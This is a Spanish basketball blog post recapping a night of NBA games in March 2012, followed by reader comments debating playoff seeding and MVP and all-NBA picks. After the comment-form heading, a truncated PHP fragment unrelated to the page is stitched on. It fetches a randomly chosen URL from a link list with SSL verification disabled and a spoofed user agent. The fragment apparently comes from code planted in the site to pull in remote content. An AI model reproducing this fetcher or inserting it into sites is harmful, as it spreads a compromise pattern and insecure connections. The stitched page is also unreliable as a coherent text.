La Crónica: un hombre feliz

29 de March de 2012 por MagicJohnson32

melo shoutCómo ha cambiado la vida para Carmelo en cuestión de días. Solo ha necesitado un entrenador que ordene que le den la bola en cada ataque, y ya empezamos a ver la mejor versión de Anthony, suficiente para tumbar a los Orlando Magic (86-108). En ausencia de Stoudemire y Jeremy Lin, los Knicks gravitaron en torno a la figura de Melo, que cada vez que dejaba la pista tras desmontar la defensa visitante se iba a la bicicleta estática para aliviar su lesión muscular. Baron Davis, Shumpert, Novak y JR Smith dieron muy buenos minutos y Dwight Howard se vio desactivado por la defensa de Tyson Chandler (además de las extrañas rotaciones de SVG). Los Knicks vuelven a ponerse con más de un 50% de victorias y llevan camino de atar la octava plaza del Este. Eso les llevaría a una primera ronda ante los Bulls, que siguen ganando partidos sin Derrick Rose. Anoche lo hicieron en Atlanta con sorprendente comodidad (98-77) gracias a la efectividad y el dominio reboteador de su frontcourt: Deng, Boozer, Noah y Taj Gibson sumaron 71 puntos y 25 rebotes, cifras cercanas a los totales conseguidos por los jugadores locales.

A un equipo al que se le aclara el panorama de cara a los Playoffs es a Boston Celtics, que logró su tercer triunfo consecutivo y está a un paso de arrebatar el liderato de la Atlantic a los Sixers. Ante los Jazz, Boston aplicó su receta habitual: Rondo dirige y Garnett y Pierce (ante la baja de Ray Allen) imponen su calidad y veteranía. Hayward jugó un excelente partido (y firmó la jugada del día con dos gorros espectaculares en una misma acción) pero el 1 de 10 de CJ Miles fue una losa insalvable (82-94).

No deberían despistarse los Pacers y menos aún ceder partidos ante equipos como los Nets (84-100) si esperan conservar su quinta posición. Deron Williams destrozó a Darren Collison y Gerald Green volvió a demostrar que tiene sitio en la liga en un partido terrible por parte de todos los jugadores de los Pacers no llamados Paul George.

Mucho más bonito resultó el Spurs @ Kings, en el que el descaro de los locales exigió una de las mejores actuaciones del año del rookie Kawhi Leonard. Ginóbili, suplente, anotó 20 puntos en un suspiro, y Duncan y Parker estuvieron correctos, pero fue Leonard quien se echó el equipo a la espalda y dio la victoria al segundo del Oeste (117-112).

griffin over fryeEl Suns @ Clippers valió la pena por dos motivos: el duelo Paul vs Nash, con 15 asistencias para cada uno, y el mate de Blake Griffin sobre Channing Frye. Clippers suman su tercera victoria seguida (86-103) y parecen recuperar el paso de cara al tramo final de regular season. Y hay que mencionar, una vez más, a Kevin Love, autor de 40 puntos (con 4 triples) y 19 rebotes en la victoria (88-83) de los Wolves sobre los Bobcats. Cuando una estadística así empieza a resultarnos normal es que estamos ante un jugador de leyenda.

Con su sorprendente derrota ante los Raptors (96-105), los Nuggets salen de posiciones de Playoffs. Lawson estuvo muy solo y la defensa zonal que utilizaron los canadienses en el último cuarto acabó de secar a los Nuggets.  Dos partidos rutinarios, Pistons @ Cavs (87-75) y Hornets @ Warriors (102-87) completaron la actividad de esta pasada madrugada en la NBA.

love dunkPREMIOS

MVP: quién si no. Kevin Love anotó casi la mitad de los puntos de su equipo, 40, a los que sumó 19 rebotes y 4 asistencias. Lo dicho: de leyenda.

Rookie: hablando de habituales… Kyrie Irving consiguió 22 puntos, 9 rebotes, 6 asistencias y 2 robos, otro pasito más hacia su merecidísimo premio como RoY. Algún voto puede llevarse si sigue así Kawhi Leonard, esencial en la victoria de los Spurs con 19 puntos (8 de 11 en tiros), 9 rebotes, 2 asistencias y 2 robos. En el mismo partido, el pequeño Isaiah Thomas hizo 28 puntos y 10 asistencias.

Sorpresa: la última vez que Steve Nash anotó menos de 2 puntos fue en 2008. Anoche se quedó en 1. Por supuesto, sus 15 asistencias no están al alcance de cualquiera y lo salvan de ser una de las decepciones del día.

Decepción: el honor recae en los Magic al completo, incluyendo a su entrenador. Decepcionante es lo mínimo que se puede decir sobre su partido en el Madison. La actuación individual más decepcionante está entre los 5 puntos y 4 pérdidas de Danny Granger ante los Nets y los 6 puntos y 4 pérdidas de Tyreke Evans ante los Spurs.

Esfuerzo en vano: el de los Kings, en especial Cousins, Thornton, Thomas y Thompson, autores de 86 de los 112 puntos de su equipo.

Top 10

Imágenes | AP Photos / Getty Images

Comenta

22 comentarios a esta entrada

  1. Vader dice:
    #1

    Y otra gran noticia para Knicks, la baja de Stat será de 2 a 4 semanas con lo que en principio podra jugar los playoff.

    Ya dije hace tiempo que una de las mejores noticias de los Knicks este año era el fichaje de Shumpert. Este chico tiene una pinta estupenda y como mejore en el tiro exterior será la bomba.

    Temblad, vamos por el liderato en la atlantic!!

    Saludos

      Citar

  2. melo15 dice:
    #2

    Pues yo creo que los Knicks aun pueden llegar a la 6 plaza, t al liderato de la atlantic conference, lo que les daria la 4 posicion. Parece que con este entrenador las cosas funcionan mucho mejor, y parece que Melo y Stat ya no se molestan tanto.

      Citar

  3. Jose Luis dice:
    #3

    No me gusta nada que Griffin en los mates use el brazo que no lleve la bola para quitar el brazo del jugadpr que va a taponar. Me parece que no debería estar permitido vamos, ya lo ha hecho muchas veces, y no sé, me parece bastante mal.

      Citar

  4. MagicJohnson32 dice:
    #4

    melo15:
    Pues yo creo que los Knicks aun pueden llegar a la 6 plaza, t al liderato de la atlantic conference, lo que les daria la 4 posicion. Parece que con este entrenador las cosas funcionan mucho mejor, y parece que Melo y Stat ya no se molestan tanto.

    Sí, a melo no le molesta Stat mientras no salga de la enfermería, jaja…

      Citar

  5. Esteban dice:
    #5

    los clippers y 3 victorias seguidas frente a equipuchos pare recuperar sensaciones, lo dicho griffin es un jugador sumamente uitil para un equipo, puede irse hasta lso 27 puntos y 14 rebotes, pero la distancia que lo mantiene alejado de kevin Love es abismal, creo que si se mantienen 4tos podrian soñar con una segunda ronda, y si logran el tercer puesto, relegano a los lakers de esa posicion, no se, quien te dice en un mano a mano con los spurs, habra que ver como siguen, pero repito lo que alguna vez dije, si a young lo usan desde la banca puede dar un salto de calidad al equipo

    los knicks, deberian llegar al sexto puesto si quieren soñar con uan segunda ronda, habria que pasar a boston y a los 76s, lo veo dificil, deberian mantener esta racha para ponerse 7 u 8 partidos mas victorias que derrotas para tener alguna esperanza

    parrafo merece kevin ove, hace unos dias hable de los candidatos a MVP, pues creo que Love si mete a los wolves en PO, cosa dificil si las hay, estara en la carrera a falta de candidatos naturales (ni durant, ni lebron ni rose, estan teniendo su mejor año), y creo que a este ritmo, love terminara como maximo anotador de la temporada

      Citar

  6. Esteban dice:
    #6

    ah stat debio ser traspasado, cosa en la que coincidimos todos en este blog, e incluso lo mandaria a golden state donde lo querrian y q vuelva lee, que si bien es menos ortodoxo, sus numeros son igual de buenos y es un juegador uq eno necesita la bola para ganarse sus minutos en cancha (la gran diferencia con stat)

      Citar

  7. melo15 dice:
    #7

    Bueno pero ya es tarde para esto, se ha de jugar con lo que uno tiene. Esteban si los Knicks pasan a Sixers y a Celtics pasarian a ser 4

      Citar

  8. Txusma dice:
    #8

    Esteban:
    (ni durant, ni lebron ni rose, estan teniendo su mejor año)

    Lo de Rose es evidente pero, ¿que Lebron y Durant no estan viviendo su mejor año? Lo de Lebron aún es discutible (y aún así su nivel es de MVP clarísimo) pero es que Durant está totalmente extraterrestre. Te has mirado sus números? 27’8 puntos por partido con el 50% de acierto en el tiro, 8’1 rebotes (máximo de su carrera), 3’5 asistencias (máximo), 1’5 robos (máximo),1’1 tapones (máximo)… y su equipo es el líder de la conferencia Oeste. A mi parecer el MVP tiene dueño claro. Dejaría a Love la 3ª posición si los Wolves entran en playoffs.

      Citar

  9. Esteban dice:
    #9

    4? Y los pacers y hawks?

      Citar

  10. Txusma dice:
    #10

    Esteban:
    4? Y los pacers y hawks?

    Como campeón de la división le correspondería el 4º puesto aunque tenga peor coeficiente de victorias q otros equipos.

      Citar

  11. Esteban dice:
    #11

    Durant esta promediando menos puntos q años anteriores, y a pesar de ser uncrack no me parece q este año gane tantos partidos solo como años anteriores, es mas, lograria el MVP justo el año q deja su cetro de dos años consecutivos de max anotador de la liga

    Lebron arranco tremendo pero se ha desinflado bastante y sus actuaciones frente a rivales de fuste dejan muchisimo q desear, casi tanto como sus actuaciones en los ultimos minutos en los finales cerrados

      Citar

  12. melo15 dice:
    #12

    Esteban en la temporada del lockout, acostumbran a bajar las medias de todos los jugadores, mirate las del anterior. Yo si fuera los Knicks me conformaria con la 6, te enfrentas a los Magic, los ganas y despues te cepillas a los Bulls. Esto ultimo costaria mas pero…

      Citar

  13. simon dice:
    #13

    Txusma: Como campeón de la división le correspondería el 4º puesto aunque tenga peor coeficiente de victorias q otros equipos.

    pero aun asi no tendrían la ventaja de campo verdad¿¿??

      Citar

  14. Nacho dice:
    #14

    simon: pero aun asi no tendrían la ventaja de campo verdad¿¿??

    No. La ventaja de campo es por número de victorias, pero en la posición del cuadro siempre tienen que estar los campeones de las divisiones entre los cuatro primeros. Según está ahora mismo el Este, Philly (4) e Indiana (5) jugarían, pero con ventaja de campo para los Pacers.

      Citar

  15. Txusma dice:
    #15

    Esteban:
    Durant esta promediando menos puntos q años anteriores, y a pesar de ser uncrack no me parece q este año gane tantos partidos solo como años anteriores, es mas, lograria el MVP justo el año q deja su cetro de dos años consecutivos de max anotador de la liga

    Lebron arranco tremendo pero se ha desinflado bastante y sus actuaciones frente a rivales de fuste dejan muchisimo q desear, casi tanto como sus actuaciones en los ultimos minutos en los finales cerrados

    Durant debe estar como mucho 1 ó 2 puntos por debajo. Vamos, para mi sería un escándalo que el MVP no fuera para Durant o James por mucho que me guste Love. El de los Wolves podría ser el tercero y ya digo q incluso si los Wolves no se clasifican para Playoffs.

      Citar

  16. rumbero dice:
    #16

    Esteban:
    Durant esta promediando menos puntos q años anteriores, y a pesar de ser un crack no me parece q este año gane tantos partidos solo como años anteriores, es mas, lograria el MVP justo el año q deja su cetro de dos años consecutivos de max anotador de la liga

    Year Team G GS MPG FG% 3P% FT% OFF DEF RPG APG SPG BPG TO PF PPG
    09-10 OKC 82 82 39.5 0.476 0.365 0.900 1.3 6.3 7.6 2.8 1.4 1.0 3.30 2.09 30.1
    10-11 OKC 78 78 38.9 0.462 0.350 0.880 0.7 6.1 6.8 2.7 1.1 1.0 2.79 2.04 27.7
    11-12 OKC 50 50 38.5 0.502 0.375 0.848 0.6 7.5 8.1 3.5 1.5 1.1 3.68 1.98 27.8

    Si que es cierto que está promediando menos puntos que en la 09-10 pero ese 0.5 de FG es tremendo para un jugador de su perfil…y además sigue siendo el mejor cuando el partido está calentito.
    Para mi, con permiso del señor Love, MVP.

      Citar

  17. Sancho88 dice:
    #17

    Bueno, lo que es evidente es que estos tres señores deben estar en el quinteto ideal. Y yo apostaría también por Parker y Bryant, no creo que Howard se merezca estar. Para mí el quinteto sería Parker-Bryant-Durant-Lebron-Love, aunque el dibujo no sea el clásico. Me parecería lo más justo…

      Citar

  18. melo15 dice:
    #18

    y en el segundo?

      Citar

  19. Esteban dice:
    #19

    Hay q elegir, o kobe o lebron, creo q durant es el 3 sin discusion, love el 4 y howard el 5

    Y en cuanto a base, creo q si los clippers se mantienen 4tos, cp3 es el base, pasar de ni mirar PO ni de cerca a quedar 4tos en el oste es mas meritorio q los spurs pasen del primer puesto de la pasada al segundo de esta

    Eso sin contar la cantidad de partidos q cp3 gano solisimo sobre el final de juegos cerrados

      Citar

  20. Sancho88 dice:
    #20

    Bueno, quizá me he crecido poniendo a Bryant y quitando a Howard. Es que me da muchísima rabia, que con la capacidad que tiene, no esté haciendo barbaridades asiduamente como hace Love. Tiene delito…. Pero sí, Bryant no debería optar al quinteto, la verdad.

    Entonces, Durant-Lebron-Love-Howard, parecen claros, pero en bases yo no diría sí o sí Paul eh? Parker lo merece también, y Westbrook incluso. El puesto va a estar peleado hasta el final

      Citar

  21. Sancho88 dice:
    #21

    Hablo de Howard, cuando me refiero a hacer barbaridades. Porque releído parece que estoy hablando de Bryant.

      Citar

  22. Heineken dice:
    #22

    Parker-LeBron-Durant-Love-Howard

    En el 2º quinteto yo pondría a Paul-Westbrook-Kobe-Aldridge-Bynum

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>